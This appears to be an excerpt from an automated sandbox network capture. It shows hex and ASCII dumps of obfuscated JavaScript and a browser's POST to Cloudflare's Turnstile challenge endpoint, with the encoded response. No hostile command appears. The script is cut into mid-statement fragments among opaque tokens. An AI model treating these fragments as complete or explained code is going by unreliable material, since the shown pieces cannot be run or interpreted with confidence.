                                                        Data Ascii: )}},eS=function(gX,d,e,f,g){return gX=gI,d={'xgNLf':function(h,i){return h==i},'KrZTN':function(h,i){return h==i},'BsNSz':function(h,i){return h===i},'CNYgQ':function(h,i){return h(i)},'GMDvo':function(h,i){return i|h},'eCDkk':function(h,i){return i==h},'
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 28 69 2c 6a 2c 6f 2c 68 30 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 68 30 3d 67 58 2c 64 5b 68 30 28 37 37 31 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 68 30 28 31 33 37 39 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 68 30 28 31 37 31 38 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 68 30 28 34 35 33 29 5d 5b 68 30 28 39 35 35 29 5d 5b 68 30 28 39 34 35 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 68 30 28 34 35 33 29 5d 5b 68 30 28 39 35 35 29 5d 5b 68 30
                                                        Data Ascii: (i,j,o,h0,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(h0=gX,d[h0(771)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[h0(1379)];J+=1)if(K=i[h0(1718)](J),Object[h0(453)][h0(955)][h0(945)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[h0(453)][h0(955)][h0
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 7c 4d 2c 49 3d 3d 64 5b 68 30 28 37 31 39 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 68 30 28 34 35 34 29 5d 28 64 5b 68 30 28 34 34 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 30 28 37 35 38 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 68 30 28 37 32 38 29 5d 28 48 3c 3c 31 2e 39 32 2c 31 2e 38 26 4d 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 30 28 34 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 68 30 28 36 37 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 64 5b 68 30 28 33
                                                        Data Ascii: |M,I==d[h0(719)](j,1)?(I=0,G[h0(454)](d[h0(445)](o,H)),H=0):I++,M=0,s++);for(M=C[h0(758)](0),s=0;16>s;H=d[h0(728)](H<<1.92,1.8&M),j-1==I?(I=0,G[h0(454)](o(H)),H=0):I++,M>>=1,s++);}D--,0==D&&(D=Math[h0(678)](2,F),F++),delete B[C]}else for(M=x[C],s=0;d[h0(3
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 5d 28 46 2c 4b 29 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 33 28 34 30 30 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 46 2a 28 30 3c 4c 3f 31 3a 30 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 33 28 36 37 38 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 33 28 31 35 31 35 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 68 33 28 33 37 37 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 33 28 31 32 34 35 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a
                                                        Data Ascii: ](F,K);L=H&G,H>>=1,0==H&&(H=j,G=d[h3(400)](o,I++)),J|=F*(0<L?1:0),F<<=1);switch(M=J){case 0:for(J=0,K=Math[h3(678)](2,8),F=1;K!=F;L=H&G,H>>=1,d[h3(1515)](0,H)&&(H=j,G=o(I++)),J|=d[h3(377)](0<L?1:0,F),F<<=1);s[B++]=e(J),M=d[h3(1245)](B,1),x--;break;case 1:
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 72 6e 20 46 2b 47 7d 2c 6a 5b 68 36 28 37 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 36 28 31 34 33 33 29 5d 3d 68 36 28 38 38 35 29 2c 6a 5b 68 36 28 31 36 35 30 29 5d 3d 68 36 28 31 31 38 37 29 2c 6a 5b 68 36 28 34 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 36 28 37 38 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6b 5b 68 36 28 31 31 32 37 29 5d 21 3d 3d 6b 5b 68 36 28 35 37 36 29 5d 29 7b 69 66 28 6c 3d 69 7c 7c 68 36 28 31 33 39 37 29 2c 6d 3d 65 4d 5b 68 36 28 39 30 35 29 5d 5b 68 36 28 31 31 34 39 29 5d 3f 6b 5b 68 36 28 31 36 33 30 29 5d 28 27 68 2f 27 2c 65
                                                        Data Ascii: rn F+G},j[h6(731)]=function(F,G){return F+G},j[h6(1433)]=h6(885),j[h6(1650)]=h6(1187),j[h6(431)]=function(F,G){return F+G},j[h6(788)]=function(F,G){return F+G},j);try{if(k[h6(1127)]!==k[h6(576)]){if(l=i||h6(1397),m=eM[h6(905)][h6(1149)]?k[h6(1630)]('h/',e
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 39 29 5d 3d 68 37 28 36 30 38 29 2c 6a 3d 69 2c 6b 3d 64 5b 68 37 28 33 37 34 29 5d 28 29 2c 6c 3d 6a 5b 68 37 28 31 37 30 36 29 5d 2c 6a 5b 68 37 28 31 35 36 37 29 5d 28 6b 5b 68 37 28 39 34 30 29 5d 28 6c 29 2c 2d 31 29 29 3f 65 4d 5b 68 37 28 31 31 36 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 38 29 7b 68 38 3d 68 37 2c 65 4d 5b 68 38 28 31 31 36 34 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6d 3d 5b 6a 5b 68 37 28 31 30 38 35 29 5d 2b 64 2c 68 37 28 36 37 39 29 2b 65 2c 6a 5b 68 37 28 35 31 34 29 5d 28 68 37 28 31 36 31 32 29 2c 66 29 2c 6a 5b 68 37 28 36 35 38 29 5d 28 6a 5b 68 37 28 35 37 32 29 5d 2c 67 29 2c 6a 5b 68 37 28 31 32 35 34 29 5d 2b 4a 53 4f 4e 5b 68 37 28 38 38 31 29 5d 28 68 29 5d 5b 68 37 28 36 38 39 29 5d 28 68 37 28 33 39 33 29 29 2c 65 4d
                                                        Data Ascii: 9)]=h7(608),j=i,k=d[h7(374)](),l=j[h7(1706)],j[h7(1567)](k[h7(940)](l),-1))?eM[h7(1160)](function(h8){h8=h7,eM[h8(1164)]()},1e3):(m=[j[h7(1085)]+d,h7(679)+e,j[h7(514)](h7(1612),f),j[h7(658)](j[h7(572)],g),j[h7(1254)]+JSON[h7(881)](h)][h7(689)](h7(393)),eM
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 49 28 31 30 33 32 29 5d 3d 66 50 2c 66 57 5b 67 49 28 39 30 33 29 5d 3d 66 51 2c 66 57 5b 67 49 28 37 32 37 29 5d 3d 66 4c 2c 66 57 5b 67 49 28 37 31 31 29 5d 3d 66 52 2c 66 57 5b 67 49 28 35 30 39 29 5d 3d 66 4f 2c 66 57 5b 67 49 28 31 33 34 38 29 5d 3d 66 4e 2c 66 57 5b 67 49 28 31 35 31 34 29 5d 3d 66 39 2c 66 57 5b 67 49 28 31 35 30 36 29 5d 3d 66 4a 2c 66 57 5b 67 49 28 34 38 34 29 5d 3d 66 49 2c 66 57 5b 67 49 28 39 37 36 29 5d 3d 66 31 2c 66 57 5b 67 49 28 31 32 36 30 29 5d 3d 66 6f 2c 66 57 5b 67 49 28 31 36 35 32 29 5d 3d 66 70 2c 66 57 5b 67 49 28 39 35 32 29 5d 3d 66 7a 2c 66 57 5b 67 49 28 37 34 33 29 5d 3d 66 79 2c 66 57 5b 67 49 28 34 31 33 29 5d 3d 66 78 2c 66 57 5b 67 49 28 35 37 37 29 5d 3d 66 77 2c 66 57 5b 67 49 28 31 34 32 38 29 5d 3d
                                                        Data Ascii: I(1032)]=fP,fW[gI(903)]=fQ,fW[gI(727)]=fL,fW[gI(711)]=fR,fW[gI(509)]=fO,fW[gI(1348)]=fN,fW[gI(1514)]=f9,fW[gI(1506)]=fJ,fW[gI(484)]=fI,fW[gI(976)]=f1,fW[gI(1260)]=fo,fW[gI(1652)]=fp,fW[gI(952)]=fz,fW[gI(743)]=fy,fW[gI(413)]=fx,fW[gI(577)]=fw,fW[gI(1428)]=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.549748104.18.94.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:35 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1739610885:1726229693:8dNeNNr3NVIZNVDXB9fIh6-yB2WjScXMoVCZfOmpcdU/8c285aefbf971821/7cbe35d3fcb33be HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 2760
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 7cbe35d3fcb33be
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/eexie/0x4AAAAAAAgfyeXMLVB_Rwr6/auto/fbE/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:35 UTC2760OUTData Raw: 76 5f 38 63 32 38 35 61 65 66 62 66 39 37 31 38 32 31 3d 53 45 67 78 57 78 49 78 47 57 41 59 67 5a 45 49 42 4f 41 4e 41 44 41 25 32 62 30 41 65 78 51 4c 6e 34 59 49 41 68 4b 71 4f 41 53 49 36 38 36 42 39 32 41 6b 78 42 4d 36 55 4e 41 75 2d 75 41 36 4f 36 2d 41 53 67 41 56 7a 41 65 4d 42 47 44 78 41 4c 41 62 46 49 78 41 31 4b 49 78 41 4f 7a 41 50 45 41 4a 41 75 45 41 75 7a 4e 24 36 70 41 6f 78 36 32 41 45 52 59 49 4b 6b 41 50 78 41 4b 61 24 70 2b 74 48 55 46 79 30 38 79 42 41 51 37 59 51 59 4a 62 67 72 67 51 62 4f 6a 57 6c 4c 7a 65 69 46 38 78 5a 5a 54 34 6e 67 38 51 41 41 4f 78 5a 30 57 50 73 2b 5a 61 41 41 6d 78 5a 72 65 42 5a 64 54 59 37 30 41 58 4d 41 44 62 6f 4b 41 71 67 6b 41 75 46 41 64 78 41 74 38 75 63 53 79 41 62 68 38 78 5a 6c 36 4d 4c 4b 63 6b
                                                        Data Ascii: v_8c285aefbf971821=SEgxWxIxGWAYgZEIBOANADA%2b0AexQLn4YIAhKqOASI686B92AkxBM6UNAu-uA6O6-ASgAVzAeMBGDxALAbFIxA1KIxAOzAPEAJAuEAuzN$6pAox62AERYIKkAPxAKa$p+tHUFy08yBAQ7YQYJbgrgQbOjWlLzeiF8xZZT4ng8QAAOxZ0WPs+ZaAAmxZreBZdTY70AXMADboKAqgkAuFAdxAt8ucSyAbh8xZl6MLKck
                                                        2024-09-13 13:06:35 UTC747INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:35 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 153404
                                                        Connection: close
                                                        cf-chl-gen: BEwRtGHNhkpgmaN0THOC3KsF+1ojH5mCJTivVI1eTziz7XEmCcod/kYpyMouBNjAjA8j1BMtiv5zme6l9aeWI87IUsM6iUJYcHpOqBDXCkPFsUQnHVjy0tm3/4iD1K/lstW8XOo7duMpunJkv0eTyuxkgOT3bWQsop2o/3y5x3Q+ONZ0RAu1XQV6B0JU5EEjs2c7DtNiQgl4L9UdgS3Qm9U1pzGR9lnKOPw8e00BjPOpMm1M+4vCajRZF2dEwe9olQUZCz3zfVpSTbBxF5i8FsOZaMCdkvkDzAKKgL9c0By1pEWFYq/v49TNS/tQWNlpcVsp29dzCGLu/6x5NHAEIzAna64HYdcMnQQ4NZfFLh7wNbTRRPC4RRkIBFosDzZeeDARh4vp1nuvcj2XFkguNblzLV5ooZHJfI9Hb+595bmfaEH1j3fOT16SU5HXQsnujOGY0YRU47YR73O8r9NiP3EyIO58QrJlLCsSyKxW11qJSww=$OwrcKsf5/Nlc8DcN
                                                        Server: cloudflare
                                                        CF-RAY: 8c285afb5a608c9c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:35 UTC622INData Raw: 72 36 75 36 66 70 61 6c 67 4c 2b 79 76 36 69 6e 6f 63 6d 6d 75 59 76 50 72 4b 79 66 72 4a 66 50 79 5a 4c 59 76 64 79 33 7a 71 75 71 30 4d 36 74 73 4c 62 44 33 4e 33 4a 35 37 36 2b 38 4e 44 6f 72 4c 48 70 79 4d 54 70 31 65 76 6d 79 37 58 47 76 50 54 31 39 73 33 37 33 75 61 39 37 77 4c 66 39 66 76 67 42 77 7a 67 2b 51 66 50 41 4f 38 50 30 75 30 57 46 74 62 62 46 66 58 7a 43 52 55 4e 37 67 2f 65 42 76 49 54 34 68 72 6b 47 2f 73 64 36 79 77 5a 44 78 76 70 38 68 58 75 43 67 63 6c 38 53 63 57 50 68 6b 32 45 44 73 50 41 7a 49 68 2f 55 45 32 4a 51 4d 67 42 45 77 6c 51 52 31 51 4c 45 59 6f 46 69 6f 52 56 55 35 50 52 31 35 49 47 52 64 4b 51 6c 51 65 4e 57 4d 35 4d 6c 4e 71 51 45 5a 63 4e 6b 49 36 4b 47 4e 76 4b 79 35 50 4c 32 4a 4e 4d 31 42 74 63 47 74 4b 50 6a 64
                                                        Data Ascii: r6u6fpalgL+yv6inocmmuYvPrKyfrJfPyZLYvdy3zquq0M6tsLbD3N3J576+8NDorLHpyMTp1evmy7XGvPT19s373ua97wLf9fvgBwzg+QfPAO8P0u0WFtbbFfXzCRUN7g/eBvIT4hrkG/sd6ywZDxvp8hXuCgcl8ScWPhk2EDsPAzIh/UE2JQMgBEwlQR1QLEYoFioRVU5PR15IGRdKQlQeNWM5MlNqQEZcNkI6KGNvKy5PL2JNM1BtcGtKPjd
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 61 52 61 59 56 69 57 6e 68 58 6a 6c 36 41 67 48 35 39 59 6d 4a 6a 6e 71 4a 36 59 49 47 6b 70 6f 78 6d 5a 34 4f 4f 62 4b 4f 47 6a 33 5a 71 71 36 69 54 69 4a 36 57 74 72 6d 50 77 4c 64 39 77 71 36 45 67 72 71 2b 6c 49 71 69 6f 72 43 4f 73 72 32 50 6e 70 50 44 77 4d 2f 42 78 73 2b 30 72 71 79 75 32 62 75 72 76 4d 36 58 7a 72 79 38 73 37 72 56 71 63 37 66 6f 63 43 6a 78 65 66 51 77 62 50 56 31 66 58 44 30 4e 47 35 33 4c 76 4a 33 74 66 50 39 2f 50 36 33 4f 48 45 42 63 49 4c 2b 4e 33 6e 37 39 76 7a 41 41 2f 67 41 51 62 32 44 67 6f 4a 2b 77 76 5a 47 42 6e 68 33 76 73 41 34 65 4d 58 45 53 72 39 4a 2f 7a 37 46 79 63 51 4d 69 6f 52 36 67 72 79 45 65 6f 6c 44 53 63 65 4c 53 67 68 45 2f 6b 35 45 53 45 6c 42 42 46 4b 4f 42 34 68 4f 68 6f 33 49 51 68 41 53 77 77 32 44
                                                        Data Ascii: aRaYViWnhXjl6AgH59YmJjnqJ6YIGkpoxmZ4OObKOGj3Zqq6iTiJ6WtrmPwLd9wq6Egrq+lIqiorCOsr2PnpPDwM/Bxs+0rqyu2burvM6Xzry8s7rVqc7focCjxefQwbPV1fXD0NG53LvJ3tfP9/P63OHEBcIL+N3n79vzAA/gAQb2DgoJ+wvZGBnh3vsA4eMXESr9J/z7FycQMioR6gryEeolDSceLSghE/k5ESElBBFKOB4hOho3IQhASww2D
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 39 65 48 32 63 67 70 75 41 63 6c 79 44 6b 5a 53 48 6d 61 6d 74 66 6f 65 59 65 4a 4a 73 66 71 43 67 74 49 47 78 6a 61 71 32 73 70 32 38 76 62 47 42 74 4a 66 43 72 37 2b 5a 78 72 50 4c 6d 63 75 4d 6d 5a 72 52 75 37 75 65 30 62 53 49 6c 39 62 44 70 61 6e 61 6e 4b 6d 75 33 4b 44 4c 72 75 4c 50 72 74 57 32 76 74 2f 4a 78 4e 2f 4d 75 64 75 2b 30 39 76 43 78 73 79 77 32 63 2b 77 74 64 4c 61 31 4d 34 41 2b 72 72 62 33 75 4c 56 39 77 58 36 33 2b 44 2b 36 38 76 68 37 75 58 70 44 50 37 6e 30 77 49 4b 2b 4f 7a 6c 43 67 30 63 2b 66 73 59 38 41 38 68 48 52 77 48 46 52 30 56 49 50 76 33 35 67 55 42 2b 77 73 65 42 53 59 31 4d 78 55 50 47 69 7a 34 4a 76 67 7a 50 44 6a 39 39 53 38 79 53 45 63 68 4a 30 4d 4b 4c 6a 59 33 52 30 4e 4a 4d 53 35 41 44 42 41 6e 4f 55 49 6b 45 68
                                                        Data Ascii: 9eH2cgpuAclyDkZSHmamtfoeYeJJsfqCgtIGxjaq2sp28vbGBtJfCr7+ZxrPLmcuMmZrRu7ue0bSIl9bDpananKmu3KDLruLPrtW2vt/JxN/Mudu+09vCxsyw2c+wtdLa1M4A+rrb3uLV9wX63+D+68vh7uXpDP7n0wIK+OzlCg0c+fsY8A8hHRwHFR0VIPv35gUB+wseBSY1MxUPGiz4JvgzPDj99S8ySEchJ0MKLjY3R0NJMS5ADBAnOUIkEh
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 63 4b 4b 67 67 6e 56 31 63 33 6c 34 66 58 74 39 6a 35 78 6f 67 59 47 52 64 57 32 5a 6c 35 65 77 63 35 4e 2b 65 35 36 4d 72 4c 32 58 6a 35 4c 42 67 62 6d 57 74 5a 32 57 75 4c 71 68 7a 71 32 37 6a 4b 2b 73 69 63 7a 47 31 4c 57 63 32 73 76 57 31 4e 66 5a 7a 4e 50 64 70 72 36 39 78 37 2f 5a 7a 4f 47 6d 34 39 6d 71 71 75 2f 54 7a 64 2f 56 78 66 72 47 79 38 58 78 32 62 6e 38 2f 65 30 46 33 50 72 36 77 67 6b 4a 31 75 54 59 39 66 67 47 37 74 30 42 42 68 50 32 41 41 4c 52 42 52 6a 37 44 67 76 65 46 42 4d 51 32 66 76 76 44 74 77 62 2b 43 6f 4b 35 39 34 48 41 2f 34 64 36 53 33 74 45 51 77 31 43 2f 55 4b 46 69 73 47 45 78 33 31 51 6a 6f 41 41 6b 41 45 2b 41 52 4b 43 51 68 46 47 69 41 6c 50 45 6b 72 52 41 34 69 44 30 45 54 54 41 77 7a 4f 79 63 6d 56 69 6b 34 58 52 31
                                                        Data Ascii: cKKggnV1c3l4fXt9j5xogYGRdW2Zl5ewc5N+e56MrL2Xj5LBgbmWtZ2WuLqhzq27jK+siczG1LWc2svW1NfZzNPdpr69x7/ZzOGm49mqqu/Tzd/VxfrGy8Xx2bn8/e0F3Pr6wgkJ1uTY9fgG7t0BBhP2AALRBRj7DgveFBMQ2fvvDtwb+CoK594HA/4d6S3tEQw1C/UKFisGEx31QjoAAkAE+ARKCQhFGiAlPEkrRA4iD0ETTAwzOycmVik4XR1
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 33 74 36 6f 49 68 39 73 4c 43 4e 6d 36 4b 4f 74 59 31 79 67 6e 47 34 68 4b 70 31 76 4c 4f 57 74 61 2b 2b 77 61 50 48 76 37 61 57 71 59 69 4a 69 4d 65 6b 72 38 58 50 7a 5a 36 31 6b 70 48 4a 70 36 6d 6f 33 74 71 59 72 4b 47 39 6f 4c 57 62 75 74 66 51 31 62 62 6f 79 71 65 6b 78 38 33 77 71 2b 76 79 33 75 47 30 30 62 4b 30 79 2f 76 6d 2b 50 6d 79 30 4e 58 56 77 65 58 65 38 4d 50 61 2b 67 48 33 36 51 37 77 2f 4e 44 61 36 75 34 45 35 77 33 6f 46 74 4d 4e 39 2f 54 31 31 75 6f 4c 49 67 34 4f 46 76 76 37 35 66 6a 33 36 43 37 36 37 44 48 6d 44 54 41 4a 38 44 48 75 4f 54 4d 78 4b 77 6f 76 4e 6a 55 52 49 68 46 41 44 50 59 4f 4d 69 55 79 47 54 34 31 51 79 51 4f 53 41 78 45 50 78 34 77 4e 69 77 71 47 55 78 48 4b 43 77 30 56 30 77 35 55 55 46 51 54 54 5a 6e 4f 55 6f 79
                                                        Data Ascii: 3t6oIh9sLCNm6KOtY1ygnG4hKp1vLOWta++waPHv7aWqYiJiMekr8XPzZ61kpHJp6mo3tqYrKG9oLWbutfQ1bboyqekx83wq+vy3uG00bK0y/vm+Pmy0NXVweXe8MPa+gH36Q7w/NDa6u4E5w3oFtMN9/T11uoLIg4OFvv75fj36C767DHmDTAJ8DHuOTMxKwovNjURIhFADPYOMiUyGT41QyQOSAxEPx4wNiwqGUxHKCw0V0w5UUFQTTZnOUoy
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 43 61 70 37 4a 7a 61 48 47 32 6f 36 65 4a 71 72 61 76 6a 72 36 55 66 4a 48 43 68 4a 57 50 74 72 2b 68 71 4d 32 32 75 6f 48 4d 6f 5a 32 6c 30 72 2b 51 70 63 32 58 78 37 44 64 78 74 71 62 32 35 79 31 77 4e 44 63 70 4c 66 6e 75 39 61 38 33 37 7a 75 77 74 33 46 70 4c 37 31 72 37 50 47 35 37 54 4f 36 64 48 53 37 37 62 59 38 39 4b 39 7a 4f 33 58 31 74 44 57 32 4e 59 4d 33 50 6a 46 42 64 2f 69 30 66 4d 4d 38 4e 48 58 34 39 51 50 47 75 62 71 32 42 50 75 33 65 30 42 33 78 6a 69 41 69 44 37 33 65 4d 62 4d 43 4c 2b 44 78 4d 73 38 78 38 42 41 44 55 52 4d 54 44 37 45 52 67 55 44 55 4d 64 49 6b 59 61 51 42 74 4a 48 6b 41 62 54 43 49 75 47 67 30 7a 54 53 6b 68 45 52 49 6e 54 69 59 6f 57 45 56 4a 56 42 49 34 47 30 30 65 50 52 35 52 49 53 45 6f 50 31 6c 45 62 43 39 70 4b
                                                        Data Ascii: Cap7JzaHG2o6eJqravjr6UfJHChJWPtr+hqM22uoHMoZ2l0r+Qpc2Xx7Ddxtqb25y1wNDcpLfnu9a837zuwt3FpL71r7PG57TO6dHS77bY89K9zO3X1tDW2NYM3PjFBd/i0fMM8NHX49QPGubq2BPu3e0B3xjiAiD73eMbMCL+DxMs8x8BADURMTD7ERgUDUMdIkYaQBtJHkAbTCIuGg0zTSkhERInTiYoWEVJVBI4G00ePR5RISEoP1lEbC9pK
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 7a 6f 34 2b 53 69 71 69 6e 74 71 31 35 72 4c 53 54 6a 72 65 6f 6d 4b 50 49 76 4d 66 44 79 36 44 4f 78 4c 4f 7a 73 63 6a 42 31 37 4b 73 32 74 76 48 76 63 6d 36 71 39 2b 78 6d 36 4c 53 77 38 43 30 6f 36 62 68 34 2b 4c 4f 32 73 48 6b 79 74 43 30 39 65 6a 6e 73 63 6a 4d 78 2f 76 65 37 2f 44 50 75 66 62 76 32 39 50 52 38 76 69 2f 31 65 41 48 41 38 77 42 77 73 2f 78 34 51 73 50 43 78 51 55 36 76 6a 35 45 74 66 36 41 42 38 57 44 51 34 52 38 74 34 6d 43 66 50 2b 42 53 72 66 47 2b 63 62 44 42 2f 38 37 53 2f 6f 47 41 34 7a 43 68 62 35 37 77 72 33 2f 44 37 38 4f 77 49 50 48 68 34 55 45 6b 6b 67 47 79 30 6b 4b 45 59 2b 53 54 55 39 4e 42 52 4b 47 54 49 73 4d 6b 73 34 53 45 46 61 51 56 77 33 46 30 55 6b 4b 44 4a 4c 50 6a 77 73 57 45 6c 63 55 46 70 71 63 57 67 30 62 55
                                                        Data Ascii: zo4+Siqintq15rLSTjreomKPIvMfDy6DOxLOzscjB17Ks2tvHvcm6q9+xm6LSw8C0o6bh4+LO2sHkytC09ejnscjMx/ve7/DPufbv29PR8vi/1eAHA8wBws/x4QsPCxQU6vj5Etf6AB8WDQ4R8t4mCfP+BSrfG+cbDB/87S/oGA4zChb57wr3/D78OwIPHh4UEkkgGy0kKEY+STU9NBRKGTIsMks4SEFaQVw3F0UkKDJLPjwsWElcUFpqcWg0bU
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 73 72 71 65 77 61 37 43 6d 48 79 50 78 4d 4b 61 70 4b 75 61 6f 70 75 48 6d 6f 6a 50 79 36 6a 53 6e 36 36 6c 78 4c 6a 56 71 4e 44 49 6d 36 75 59 32 37 54 54 30 37 48 5a 78 62 2f 72 71 74 79 75 36 63 32 35 78 63 48 6f 36 61 33 6c 34 73 75 30 38 2b 2f 78 33 4c 48 31 79 73 4c 56 7a 4f 37 41 35 38 41 47 2f 67 7a 32 37 41 54 4e 44 63 66 37 33 65 41 4a 34 76 6a 6e 36 4f 49 56 44 39 73 48 32 51 45 57 41 42 51 44 39 42 55 52 4b 68 33 35 33 65 4d 6c 35 69 72 39 4c 53 55 6b 45 79 51 54 38 52 67 76 4e 68 30 7a 4d 76 63 2b 48 78 59 50 47 41 30 46 2f 51 59 44 53 67 63 33 48 44 70 4c 50 55 55 4c 55 51 34 79 45 41 38 54 4e 6b 6b 71 55 46 5a 58 4e 55 78 62 48 6b 4e 45 59 79 5a 48 4d 57 5a 46 50 45 42 57 50 55 68 71 59 32 78 51 4e 45 68 4b 4c 58 4e 46 61 6e 78 48 63 56 6c
                                                        Data Ascii: srqewa7CmHyPxMKapKuaopuHmojPy6jSn66lxLjVqNDIm6uY27TT07HZxb/rqtyu6c25xcHo6a3l4su08+/x3LH1ysLVzO7A58AG/gz27ATNDcf73eAJ4vjn6OIVD9sH2QEWABQD9BURKh353eMl5ir9LSUkEyQT8RgvNh0zMvc+HxYPGA0F/QYDSgc3HDpLPUULUQ4yEA8TNkkqUFZXNUxbHkNEYyZHMWZFPEBWPUhqY2xQNEhKLXNFanxHcVl
                                                        2024-09-13 13:06:35 UTC1369INData Raw: 62 47 47 71 4d 6d 6d 76 5a 32 6d 78 62 69 66 77 63 6a 4f 76 59 2f 4b 79 64 61 51 73 62 6e 4d 75 4b 65 7a 32 39 43 61 72 39 48 59 32 61 54 59 78 71 43 38 33 75 58 73 72 63 2f 6f 7a 2b 53 71 38 63 6a 70 38 2b 4c 59 36 65 2b 36 7a 63 6e 31 34 67 50 6b 2b 75 44 79 30 41 6e 49 77 67 76 32 36 67 76 4c 37 41 4c 78 42 74 7a 6a 38 39 62 6f 47 74 55 4f 39 77 30 64 37 66 6f 62 2b 2f 49 44 39 64 33 36 43 69 41 71 41 67 6a 6c 39 77 41 48 49 79 6f 49 44 69 67 6c 4b 68 67 37 48 41 30 73 4c 69 34 77 2f 52 4e 42 4f 44 38 43 4d 79 67 33 4a 76 78 4d 54 51 51 71 50 78 42 51 49 6b 30 72 51 78 42 52 4e 53 63 4e 4e 6c 4a 51 4d 30 31 4c 4c 31 35 68 55 44 55 66 57 31 49 6a 4b 31 74 4e 4a 30 73 2f 4b 45 74 68 61 57 5a 46 58 30 64 61 4e 55 77 75 61 48 52 4a 54 6e 42 42 57 45 42 30
